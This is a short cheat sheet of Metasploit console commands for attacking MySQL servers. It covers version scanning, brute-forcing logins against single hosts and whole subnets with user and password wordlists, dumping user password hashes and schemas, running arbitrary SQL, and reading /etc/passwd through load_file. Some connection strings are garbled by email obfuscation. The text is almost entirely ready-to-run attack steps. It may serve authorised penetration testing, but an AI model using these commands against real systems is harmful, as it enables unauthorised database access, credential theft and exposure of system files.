MySQL Pentest using Metasploit

MySQL Enumeration

use auxiliary/scanner/mysql/mysql_version
run mysql://127.0.0.1

MySQL Login / Bruteforce

MySQL credentials to validate

use auxiliary/scanner/mysql/mysql_login
run 'mysql://root: a b c [email protected]'

Re-using MySQL credentials in a subnet

use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50

Using an alternative port

use auxiliary/scanner/mysql/mysql_login
run mysql://user:[email protected]:2222

Brute-force host with known user and password list:

use auxiliary/scanner/mysql/mysql_login
run mysql://[email protected] threads=50 pass_file=./wordlist.txt

Brute-force credentials:

use auxiliary/scanner/mysql/mysql_login
run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt

Brute-force credentials in a subnet:

use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
run cidr:/24:mysql://[email protected] threads=50 pass_file=./wordlist.txt

MySQL Dumping

User and hash dump:

use auxiliary/scanner/mysql/mysql_hashdump
run 'mysql://root: a b c [email protected]'

Schema dump:

use auxiliary/scanner/mysql/mysql_schemadump
run 'mysql://root: a b c [email protected]'

MySQL Querying

Execute raw SQL:

use admin/mysql/mysql_sql
run 'mysql://root: a b c [email protected]' sql='select version()'

Load a file from file system

use admin/mysql/mysql_sql
run SQL select load_file(\'/etc/passwd\')